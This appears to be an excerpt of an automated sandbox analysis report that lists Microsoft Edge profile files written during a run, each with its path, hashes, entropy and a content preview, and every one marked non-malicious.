                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3525d7b9-6e57-4030-8096-9daab3663f96.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24958
                                                                                                                                                                  Entropy (8bit):6.0307820345439636
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:9MkbJrT8IeQc5w1luQ9P4l/2CwL5uTY3JU:9Mk1rT8HY1g72FuTT
                                                                                                                                                                  MD5:F4F2F7664248BA74A7E4F0C28EC311E4
                                                                                                                                                                  SHA1:A90834ECF9034C8083D128B162B87D8D45132810
                                                                                                                                                                  SHA-256:8E2792F46C2CF1617091D752C3A073FCD131F5BF1DB06A16B12BF0BAA520E139
                                                                                                                                                                  SHA-512:4C37BCDE943D270DF24DA6C9DD925330E325D6808EE3C0FEED983E0984296271EC474E4A65ED0564DA0B7C0594F19A74E37DF0F66B382D57143F84A08E3EAC93
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3df738f5-503d-49ee-afbb-5cc32acc21f8.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9377
                                                                                                                                                                  Entropy (8bit):5.589871438331405
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:uxsNwhEBCdViRUvEIx6uE1nkCIMMT2WQ/a:0sNwhzWC1WkCIMMT2W4a
                                                                                                                                                                  MD5:EA2308502EDF20B8168602A6E60A1CC4
                                                                                                                                                                  SHA1:35B7294564BDD8E04AD95DE9E0DADD4A5E13F95C
                                                                                                                                                                  SHA-256:433BBAF8A675FD00AE35D0EF28B7397769C7ED42D588658C1C75AB586C3EE0F6
                                                                                                                                                                  SHA-512:40A8CDC4E6F033BAF2AB137ABF845F6B7FB11207FCF8365D9C6AB0D515D6B16196C0459969A15535FCC8AC0307FB207BC3A7E5AE7E71D83561B2FBAC03097A34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\58c68781-c9d2-428f-9c8e-76844f23dfd2.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9377
                                                                                                                                                                  Entropy (8bit):5.589864916857852
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:uxsNwhEBCdViRUvEIx6uHyGkCIMMT2WQ/a:0sNwhzWC18VCIMMT2W4a
                                                                                                                                                                  MD5:9C477EED8667344EB66F7309574C097A
                                                                                                                                                                  SHA1:C6D6ED0B0C448FA35E159C6A9F418B1075AAC29E
                                                                                                                                                                  SHA-256:79A9CDC7240D84A9D3B17C74374DCFE0807BDE39578709908E714EF1490CCEEC
                                                                                                                                                                  SHA-512:16C3673130FB0477AA51B4EF5AE5228BBC683557701AE4F4907BE1979D543F7055D14401D0878B6BCEB93FCA3D5EA125AFF298FBC941B1A79DEBFB9C5E3B8307
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\67a72085-8769-46d1-896a-0aa709633a4e.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7f6ea47e-084b-44d1-9012-fbe40f853636.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8291
                                                                                                                                                                  Entropy (8bit):5.790107378378246
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fsNAtBCteiRU2qj/lkCW6qRAq1k8SPxVLZ7VTiQ:fsNAKdZg/2CW6q3QxVNZTiQ
                                                                                                                                                                  MD5:3AA455DF2A7FDECB545D8AB960728C12
                                                                                                                                                                  SHA1:00689E788D7BD4301B4391A95DBBAFC14CCCD3A4
                                                                                                                                                                  SHA-256:6B605CFC19F6995E627FFF2985AB9DB1E6690C8420E5BCED6BE8E57A0FA5E8B0
                                                                                                                                                                  SHA-512:9B77EB1A4A0882D944FEE31C17B75C398465477FCB1D5520C219F3D690140FFB242505BC88427E2E99A761ACC60807BA7A290925A659389F18B9F6AB649C9A13
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\80189800-5abe-471e-b927-c5c6f9815c7f.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):9377
                                                                                                                                                                  Entropy (8bit):5.589871438331405
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:uxsNwhEBCdViRUvEIx6uE1nkCIMMT2WQ/a:0sNwhzWC1WkCIMMT2W4a
                                                                                                                                                                  MD5:EA2308502EDF20B8168602A6E60A1CC4
                                                                                                                                                                  SHA1:35B7294564BDD8E04AD95DE9E0DADD4A5E13F95C
                                                                                                                                                                  SHA-256:433BBAF8A675FD00AE35D0EF28B7397769C7ED42D588658C1C75AB586C3EE0F6
                                                                                                                                                                  SHA-512:40A8CDC4E6F033BAF2AB137ABF845F6B7FB11207FCF8365D9C6AB0D515D6B16196C0459969A15535FCC8AC0307FB207BC3A7E5AE7E71D83561B2FBAC03097A34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\02fcb1ed-32be-4561-a0c2-4a85bdbbd2ce.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C5691-1700.pma

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.43895561190777904
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:Yy9Tb5n2qRloGdxFvIeEQ0E9CePINOO9qsW1qviYiQW1ig1HFC:nbIOl9dfvIeZzoOUqsW1qviYiniaH8
                                                                                                                                                                  MD5:DC7F7DDD5F1E8D95AA753F1BEE234F3A
                                                                                                                                                                  SHA1:F33456420C2793E02B651B7017C65AF5C5B0F80A
                                                                                                                                                                  SHA-256:2AB013B193BC9611231F9C9D0755A8AE9A69774CD0A0880720DC400A7540E3ED
                                                                                                                                                                  SHA-512:A693F2CC18514D39C2D126EE8B69F11F55F1BEF8625D05FB97386825E9442E55F620E05B058E3013522D1936FB2BC7ED7598E7F84FBF514D69D1A4CA8E856D1E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............P...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....m.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K...G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C5691-17A0.pma

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.03936653229870678
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:XI01utmqvDqKX2JsZTkmtzH6DL8gwXRRPkcah+XNEhcN0RQMB/yZWgn8y08Tcm2D:Y0EtyppFhkDGpyZb08T2RGOD
                                                                                                                                                                  MD5:ADC4558F36641D1040B9E7D78CE4ABC6
                                                                                                                                                                  SHA1:8EB5E56FBB9C9A3379B3F8B564BC92A48949C082
                                                                                                                                                                  SHA-256:D99862BCFEAA8FCE25F6F60F74D71B31BAF0CE276463AF499FBE6F0752A1CD88
                                                                                                                                                                  SHA-512:B04E0E44A60F738DBD12308B325EADA376FF68557FD58E2F367A4D9C684692F44BE3B2453716544D0B6DCBBB71E47B7729ACE9F15250458964943C1E42078E6A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............p`..(P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....u.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U..G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C56A6-1E78.pma

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.04072953774759179
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:IE0EbZmqvDtKX77JEa3XxxTxqZ/g+XI970R6Eqh57NgGnG1gQMWP0Bn8y08Tcm2D:b0EZ4eK8Y9FhxFCgaPS08T2RGOD
                                                                                                                                                                  MD5:26E1CC941F3158E426DC481D467007BD
                                                                                                                                                                  SHA1:67EE19A9DA3D161A08CA3707B69146C17C4DBA76
                                                                                                                                                                  SHA-256:16AC3F500B31348AA9ABB6208696678D2F3C6377BD688DCB0B8645DB213AA80D
                                                                                                                                                                  SHA-512:2E70B717946B57665D8E694445B2F3B79176B28E42B4F351B7E972ACF4BE0A70F449F33166170D4E4411A01EEAD2CA9FA08336898D7FA2DAC044B7AA741504FE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677C56AF-C68.pma

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.03985340798929576
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:0J0EbZmqvD3KX72JEa3Xxx7uqZGXPtg34khtbNE3nnI1gQMu1oBLn8y08Tcm2RGY:+0EZLe18xphlCggi1C08T2RGOD
                                                                                                                                                                  MD5:2F9BA9E7B1260D2586C6CF46AC03F81D
                                                                                                                                                                  SHA1:9FCED6E297662F5D4D9B42191110CE029F1DCECB
                                                                                                                                                                  SHA-256:4E3B576D7C668C9CF0D52BFC5E26D68AC161CF86DD1805A53BD3282959C91E11
                                                                                                                                                                  SHA-512:595E925159ED7025534B5641D77A32DD9568210BB2AE30E9EE1E83E8FD590707B90FD0A037F42CA0B526445789CD4FB88D0A9CBCBC21DC9A9CED86024A3D674C
                                                                                                                                                                  Malicious:false
